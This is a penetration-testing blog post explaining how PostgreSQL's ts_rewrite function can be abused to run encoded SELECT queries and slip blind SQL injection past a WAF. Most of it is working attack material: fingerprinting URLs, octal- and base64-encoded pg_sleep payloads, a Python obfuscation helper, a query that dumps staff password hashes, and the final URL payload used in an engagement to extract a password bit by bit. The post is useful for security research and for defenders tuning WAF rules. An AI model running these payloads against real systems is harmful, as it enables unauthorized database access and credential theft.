Don't fear the bark, ts_rewrite to dodge the mark

Written by Gaetan Ferry - 26/11/2020 - in Pentest - Download
You probably already have encountered a fanatical WAF during an engagement that turned you crazy preventing your almighty SQL injection from being exploited properly. This will never happen again thanks to a novel advanced technique based on artificial intelligence and block chain analysis.

Read this article to know how.

Disclaimer: this is click-bait.

Overture

During a past assessment, we discovered a classical but nice SQL injection vulnerability. Nothing too fancy, a simple blind exploitation seemed possible. We were able to run basic fingerprinting payloads.

http://domain.tld/path/id=189-ascii('!')

http://domain.tld/path/id=189-(case when 'a'='a' then 33 else 31 end)

http://domain.tld/path/id=189-(case when left(right('ab',2),1)='a' then 33 else 31 end)

This allowed collecting the technical description of the database engine with a bit of Python.

$ python3 sqli.py "version()"                                                                  
105                                                                             
PostgreSQL 9.6.10 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-28), 64-bit

However, as soon as the payload contained a pattern similar to SELECT.*FROM, a WAF was triggered. It was probably a BigIP F5, without that much confidence. Trying our best with the regular bypasses did not lead anywhere.

That's when we started digging through Postgre's documentation and discovered the beautiful world of Full Text Search1.

Bypass that WAF!

PostgreSQL text search features

PostgreSQL text search functions and operators are mostly obscure without prior knowledge. Looking at their documentation2 should be enough to let you understand why it is:

Operator: ||
Return Type: tsvector
Description: concatenate tsvectors
Example: 'a:1 b:2'::tsvector || 'c:1 d:2 b:3'::tsvector
Result: 'a':1 'b':2,5 'c':3 'd':4

Damned, where does that 2,5 even comes from? Actually, all of that makes sense if you read the documentation carefully enough. But let's go straight to the point. When scrolling through the functions, most of them have parameters of type ts_query, ts_vector or of type text but with spooky names like "lexemes".

Function: setweight(vector tsvector, weight "char", lexemes text[])
Return Type: tsvector
Description: assign weight to elements of vector that are listed in lexemes
Example: setweight('fat:2,4 cat:3 rat:5B'::tsvector, 'A', '{cat,rat}')
Result: 'cat':3A 'fat':2,4 'rat':5A

However, one function caught our attention, namely ts_rewrite. It accepts two parameters query and select of types tsquery and text.

ts_rewrite(query tsquery, select text)   

While the first parameter is still obscure at the moment, the second one looks interesting. Wouldn't it be convenient if that strange function were actually evaluating a text query somehow? The description of the function is sparse and does not really enlighten us.

replace using targets and substitutes from a SELECT command

However, the provided example seems to confirm our first thought.

SELECT ts_rewrite('a & b'::tsquery, 'SELECT t,s FROM aliases')

Let's take a running pg instance and see what actually happens.

pagila=$ select ts_rewrite('testQuery', 'SELECT 1');
ERROR:  ts_rewrite query must return two tsquery columns

Two things appear, first the tsquery query argument can apparently be a normal string which is great. Then, the eval'd request must have a specific form which is not that cool. However, a question arises: does the type error come from an initial type checking or is the result of the request checked afterward? Even if the answer might seem obvious, a quick test on our pg instance will sort things out.

pagila=$ select ts_rewrite('testQuery', 'SELECT pg_sleep(10)');
# Here, you will have to trust us but we really waited 10s. Test it if you don't :)
ERROR:  ts_rewrite query must return two tsquery columns

Voila! It appears the request is executed and the result types are checked afterward. Even if we do not retrieve any information from the eval'd request, this is still eligible for a time based exploitation. The only thing left is obfuscating the SELECT request to hide the spotted key words.

Obfuscating the payload

Here, we are not speaking about anything too complex. Any encoding of the query should do the trick as long as the SELECT.*FROM pattern does not clearly appear. Fortunately, PostgreSQL provides a decode function that allows... well, decoding things from multiple forms:

  • base64
  • hex
  • escape

Depending on the WAF you are facing, you might find one or the other to be working. For us, only escape proved useful as it seems WAFs are aware of base64 which is not a surprise. Anyway, each encoding can be applied to our sleep request for the following results:

  • U0VMRUNUIHBnX3NsZWVwKDEwKQ==
  • 53454c4543542070675f736c65657028313029
  • \123\105\114\105\103\124\040\160\147\137\163\154\145\145\160\050\061\060\051

The last encoding is obtained with a bit of python black magic.

def obfuuuu(query):
    return "".join("\\%03o"%b for b in query.encode("utf8"))

Decoding is performed with the decode function so that our payload is now looking like this:

select ts_rewrite('shock', decode('\123\105\114\105\103\124\040\160\147\137\163\154\145\145\160\050\061\060\051', 'escape'));

or maybe this if your WAF is a bit less of a fiend:

select ts_rewrite('lock', decode('U0VMRUNUIHBnX3NsZWVwKDEwKQ==', 'base64'));

And then, drum roll, finger crossed... Nope.

pagila=$ select ts_rewrite('barrel', decode('\123\105\114\105\103\124\040\160\147\137\163\154\145\145\160\050\061\060\051', 'escape'));
ERROR:  function ts_rewrite(unknown, bytea) does not exist
LINE 1: select ts_rewrite('barrel', decode('\123\105\114\105\103\...
               ^
HINT:  No function matches the given name and argument types. You might need to add explicit type casts.

Indeed, the decode function returns a bytea type (read this as python's bytes) where the ts_rewrite function expects a text type. A new conversion is necessary. Reading the documentation from https://www.postgresql.org/docs/9.1/functions-string.html we identified two simple solutions, none of which is really satisfying:

  • convert_from(string bytea, src_encoding name) -> text
  • encode(data bytea, format text) -> text

The first function does exactly what we want, by specifying a correct encoding in the src_encoding parameter, you get the string you expect to see. But you probably got the problem here. Yep, the name of the function contains from which can panic your WAF.
The other one accepts only the three kind of encoding we previously used which does not seem OK for what we want to get. However, what is interesting is that escape will only encode characters < 0x20 or > 0x7E. Therefore, as long as your SQLi payload does not contain exotic characters, the result of the escape encoding should look fine.

In most situations you should probably go with the escape decoding except when exploiting a french / german / islandic database which might contain é, ß or ð in some way. It is even possible you find a specific way to reference those chars in your specific context. In that case, your payload would look like:

select ts_rewrite('barrel', encode(decode('\123\105\114\105\103\124\040\160\147\137\163\154\145\145\160\050\061\060\051', 'escape'), 'escape'));

However, if your WAF is not that fanatical, you might find that convert_from is okay for you. In that case, the payload turns into:

select ts_rewrite('lock', convert_from(decode('\123\105\114\105\103\124\040\160\147\137\163\154\145\145\160\050\061\060\051', 'escape'), 'utf8'));

Anyway, whatever the choice you make, you are now in position to turn your doomed SQL injection into a shiny time based blind exploit. Isn't that neat?

Late proofreading discovery

About two minutes before submitting this article to the pitiless judgement of the internet fellowship, one of my workmate came with a remark.

No need for the encode / decode workflow, you can just SELECT ts_rewrite('a & b'::tsquery, E'\123\105\114\105\103\124\040\160\147\137\163\154\145\145\160\050\061\060\051'), check https://www.postgresql.org/docs/9.1/sql-syntax-lexical.html#SQL-SYNTAX-….

It actually works. Kudos to him (@loadlow).

Going further

At this stage, we never tried to understand the reality behind the ts_query type and the select statement we exploited. While this still allows the exploitation with a time based method, we might achieve a better result if the ts_rewrite is actually capable of returning some data.

In essence, the ts_rewrite is nothing more than a sed s/. It replaces parts of the query parameter with the results of the select statement from the second parameters. If things were simple, we would have something like:

pagila=$ select ts_rewrite('lock', 'SELECT ''lock'', ''barrel''');
 ts_rewrite
------------
 'barrel'
(1 row)

But experience proved that the real result is nearer from "ERROR YOU FULL TEXT SEARCH RETARD". This is because all arguments and returned column are of type ts_query and not text. On the surface we might want to use the to_tsquery function that takes text as input and returns the corresponding ts_query. It actually works pretty well (don't ask us why the query parameter is auto-casted and not the select result):

pagila=$ select ts_rewrite('lock', 'SELECT to_tsquery(''lock''), to_tsquery(''barrel'')');
 ts_rewrite
------------
 'barrel'
(1 row)

However, when digging deeper, things are not that easy and strange behaviors appear.

pagila=$ select ts_rewrite('lock', 'SELECT to_tsquery(''lock''), to_tsquery(''barrels'')');
 ts_rewrite
------------
 'barrel'    <- Note the missing 's'
(1 row)

pagila=$ select ts_rewrite('lock', 'SELECT to_tsquery(''lock''), to_tsquery(''shock and barrel'')');
ERROR:  syntax error in tsquery: "shock and barrel"

pagila=$ select ts_rewrite('lock', 'SELECT to_tsquery(''lock''), to_tsquery(''Shock & and & barrels'')');
         ts_rewrite         
----------------------------
 'shock' & 'barrel' & 'and' <- Note the lowercase and the missing s
(1 row)

In fact, ts_queries are smart in what they are meant to do. A query is actually a set of lexemes which are combined together in various ways to describe a text to search more or less precisely. As such, a normalization is performed on the search terms.

In a perfect world, we could have just retrieved some data from the database in the second column of the SELECT statement and performed our injection magic from it (namely a boolean based blind injection or something equivalent). However, it appears that the form of the extracted data might change when casted to ts_query. This is not a problem if your data has a simple form. For example, retrieving a password hash or most table / column names is likely to succeed.

pagila=$ select ts_rewrite('lock', 'SELECT to_tsquery(''lock''), to_tsquery(password) from staff');
                 ts_rewrite                 
--------------------------------------------
 '8cb2237d0679ca88db6464eac60da96345513964'
(1 row)


For other cases, encoding to hex is sufficient. Indeed, none of the characters from the hex charset is meaningful in a ts_query.

pagila=$ select last_update from staff limit 1;
        last_update        
---------------------------
 2017-05-16 16:13:11.79328
(1 row)

pagila=$ select ts_rewrite('lock', 'SELECT to_tsquery(''lock''), to_tsquery(encode(last_update::text::bytea, ''hex'')) from staff');
                      ts_rewrite                      
------------------------------------------------------
 '323031372d30352d31362031363a31333a31312e3739333238'
(1 row)

$ echo '323031372d30352d31362031363a31333a31312e3739333238' | xxd -r -ps
2017-05-16 16:13:11.79328

When adding the """obfuscation""" layer, the final payload looks like:

pagila=$ select ts_rewrite('lock', encode(decode('U0VMRUNUIHRvX3RzcXVlcnkoJ2xvY2snKSwgdG9fdHNxdWVyeShlbmNvZGUobGFzdF91cGRhdGU6OnRleHQ6OmJ5dGVhLCAnaGV4JykpIGZyb20gc3RhZmYK', 'base64'), 'escape'));
                      ts_rewrite                      
------------------------------------------------------
 '323031372d30352d31362031363a31333a31312e3739333238'
(1 row)

Putting things together

What we achieved is retrieving information from the base without using the blacklisted SELECT and FROM keywords. Depending on the injection context, this still has to be wrapped with more SQL to achieve a boolean blind like exploit (or whatever other technique that fits your target). It is not possible to give a payload that will match every situation, but a few things have to be considered:

  • The result of the ts_rewrite call has to be casted to text to be used with ascii, left or other string functions.
  • You might need to circumvent other limitations of your WAF, for example the use of single quotes. Be creative, you can combine this with other techniques.
  • ts_rewrite is a very visible pattern. This method will probably be part of history sooner or later. That's life :)

To be practical, here is the payload we ended using during our engagement. It only dumps the first bit of the hex encoded password and needs to be iterated, like any other blind exploit.

http://domain.tld/path/id=41-(1&ascii((ts_rewrite('bla',encode(decode('\123\105\114\105\103\124\040\164\157\137\164\163\161\165\145\162\171\050\047\142\154\141\047\051\054\164\157\137\164\163\161\165\145\162\171\050\162\151\147\150\164\050\154\145\146\164\050\050\123\105\114\105\103\124\040\145\156\143\157\144\145\050\160\141\163\163\167\157\162\144\072\072\142\171\164\145\141\054\040\047\150\145\170\047\051\040\146\162\157\155\040\163\164\141\146\146\040\154\151\155\151\164\040\061\051\054\061\051\054\061\051\051','escape'),'escape'))::text)))


There are probably better ways to use ts_rewrite. At the time of the engagement, we did not have the time to think elegant. The fact is it worked for us. Make it work for you!

Disclaimer: You might think about using the ts_rewrite function to execute insert statements. It does not work. You might think about stacking an insert after the select statement. Does not work either. In both cases the function stops before the evaluation for some reason.

However, if you find any nice trick to make it work, feel free to tell us! We would be glad to hear about that.